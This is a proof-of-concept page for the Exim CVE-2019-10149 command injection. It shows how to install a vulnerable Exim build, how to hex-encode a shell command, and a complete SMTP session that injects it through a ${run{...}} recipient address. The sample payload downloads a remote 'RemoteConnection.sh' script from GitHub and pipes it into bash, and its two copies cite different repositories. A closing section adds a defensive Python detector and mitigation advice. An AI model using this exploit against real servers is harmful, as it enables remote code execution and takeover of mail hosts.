
CVE-2019-10149 PoC - Exim OS command injection vulnerability

Source
Related vulnerability
Title: Exim OS command injection vulnerability (CVE-2019-10149)
Description: Exim is an open-source message transfer agent (MTA) that runs on Unix systems; it is mainly responsible for routing, forwarding and delivering mail. Exim versions 4.87 through 4.91 contain an OS command injection vulnerability. The vulnerability stems from the network system or product failing to correctly validate input data.
Introduction
# CVE-2019-10149 - Exim 4.87 < 4.91
Instructions for installing a vulnerable version of Exim and its exploitation
Tested on Ubuntu 16.04 Linux with Exim 4.89

## Exim installation
Download and extract exim version 4.89
 * wget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz && tar -xvf exim-4.89.tar.xz

Move into the extracted folder
 * cd exim-4.89/

Copy and modify required config files
 * sed -e 's,^EXIM_USER.*$,EXIM_USER=exim,' src/EDITME > Local/Makefile

 * cp exim_monitor/EDITME Local/eximon.conf

Create exim user and group
 * sudo groupadd -g 31 exim 

 * sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim

Install dependencies
 * sudo apt-get update
 * sudo apt-get install -y make build-essential libpcre3-dev libdb-dev libxt-dev libxaw7-dev

Install exim 4.89
 * sudo make install

Edit /usr/exim/configure to allow relaying so we can exploit without waiting 7 days
 * sudo sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains = */' /usr/exim/configure
 * sudo sed -i '/hostlist   relay_from_hosts = localhost/c\hostlist   relay_from_hosts = 0.0.0.0' /usr/exim/configure
 * sudo sed -i '/require verify = recipient/c\#require verify = recipient' /usr/exim/configure

Run exim as user exim
 * sudo -H -u exim /usr/exim/bin/exim -bd -d-receive    
	
## Crafting the exploit
Convert your shell command to hex. Example:
 * /bin/sh -c "wget https://raw.githubusercontent.com/hyim0810/CVE-2019-10149/main/RemoteConnection.sh" -O - | bash
 * \x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fhyim0810\x2FCVE\x2D2019\x2D10149\x2Fmain\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22\
	
	
Encoding table used in the example above:
 * \t-c\ = -c
 * \t\= space
 * x20 = space
 * x7C = |
 * x2F = /
 * x3A = :
 * x2D = -
 * x3E = >
 * x26 = &
 * x22 = "
 * x2E = .
	
## Exploit usage
First we use nc to start a connection to the server.
 * nc 192.168.0.168 25
 
Once we are connected we say HELO.
 * helo localhost
 * (Answer: 250 exim Hello localhost [192.168.0.168])

Next, we set the sender address to blank.
 * mail from:<>
 * (Answer: 250 OK)

Then we set our recipient address to the payload built earlier, inserting the desired command where the ellipsis is: rcpt to:<${run{...}}@localhost>.
 * rcpt to:<${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22\}}@localhost>
 * (Answer: 250 Accepted)

Finally, type DATA, followed by the 31 lines below, a blank line, and a period.
 * DATA
 * Received: 1
 * Received: 2
 * Received: 3
 * Received: 4
 * Received: 5
 * Received: 6
 * Received: 7
 * Received: 8
 * Received: 9
 * Received: 10
 * Received: 11
 * Received: 12
 * Received: 13
 * Received: 14
 * Received: 15
 * Received: 16
 * Received: 17
 * Received: 18
 * Received: 19
 * Received: 20
 * Received: 21
 * Received: 22
 * Received: 23
 * Received: 24
 * Received: 25
 * Received: 26
 * Received: 27
 * Received: 28
 * Received: 29
 * Received: 30
 * Received: 31
 * 
 * .
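The session above is what this vulnerability looks like on the wire: the injected command rides inside the local part of the RCPT TO address as an Exim `${run{...}}` expansion, with the command's bytes hidden behind `\xNN` and `\t` escapes. The following triage helper is an added example, written for this page and not part of the PoC repository: it checks whether a reported Exim version falls in the affected 4.87 to 4.91 range (the bug was fixed in 4.92), scans captured SMTP lines for recipient addresses that carry an expansion, and decodes the escapes so an analyst can read the attempted command. The function names and the sample lines at the bottom are constructed for the demonstration; the lines imitate an SMTP session capture, not Exim's own main log format.

```python
import re

# Affected range as stated in the advisory: 4.87 through 4.91 (fixed in 4.92).
AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)


def parse_version(text):
    """Pull 'major.minor' out of text such as the first line of `exim -bV`."""
    m = re.search(r"(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no version number in %r" % text)
    return int(m.group(1)), int(m.group(2))


def is_affected_version(text):
    """True when the version lies inside the CVE-2019-10149 range."""
    return AFFECTED_MIN <= parse_version(text) <= AFFECTED_MAX


# RCPT TO:<...> as typed in the session; the PoC encodes '>' as \x3E so the
# address itself never contains a literal closing bracket.
RCPT_RE = re.compile(r"rcpt\s+to\s*:\s*<([^>]*)>", re.IGNORECASE)
# The expansion primitive abused by this CVE.
RUN_RE = re.compile(r"\$\{\s*run\s*\{", re.IGNORECASE)


def decode_escapes(s):
    """Undo the PoC's encoding: \\xNN -> character, \\t -> space.

    A lone backslash (the PoC writes '\\t\\https', leaving '\\' in front of
    'https') is dropped so the decoded command reads naturally.
    """
    s = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s = s.replace("\\t", " ")
    return s.replace("\\", "")


def extract_run_command(local_part):
    """Return the decoded command inside ${run{...}}, or None if absent."""
    m = RUN_RE.search(local_part)
    if not m:
        return None
    end = local_part.find("}}", m.end())
    if end == -1:          # truncated capture: decode what is there
        end = len(local_part)
    return decode_escapes(local_part[m.end():end])


def scan_lines(lines):
    """Flag every RCPT TO whose address contains an Exim expansion '${'."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = RCPT_RE.search(line)
        if not m:
            continue
        rcpt = m.group(1)
        if "${" not in rcpt:
            continue
        hits.append({"line": n, "recipient": rcpt,
                     "command": extract_run_command(rcpt)})
    return hits


# Constructed sample capture (hypothetical hosts and commands).
SAMPLE_LINES = [
    r"2019-06-10 12:00:01 SMTP connection from [10.0.0.5]",
    r"2019-06-10 12:00:02 H=[10.0.0.5] rcpt to:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x22}}@localhost>",
    r"2019-06-10 12:00:03 H=[10.0.0.9] rcpt to:<alice@example.org>",
    r"2019-06-10 12:00:04 H=[10.0.0.5] rcpt to:<bob${run{\x2Fusr\x2Fbin\x2Ftouch\t\x2Ftmp\x2Fmarker}}@localhost>",
]

if __name__ == "__main__":
    print("affected:", is_affected_version("Exim version 4.89 #1"))
    for hit in scan_lines(SAMPLE_LINES):
        print("line %d: %s -> %s" % (hit["line"], hit["recipient"], hit["command"]))
```

On a real deployment the same two checks map to mitigations: `exim -bV` answering anything below 4.92 means patch first, and any `${` in a recipient local part is a reason to reject the message at RCPT time rather than let the address reach routing, since a legitimate mailbox name never needs Exim expansion syntax.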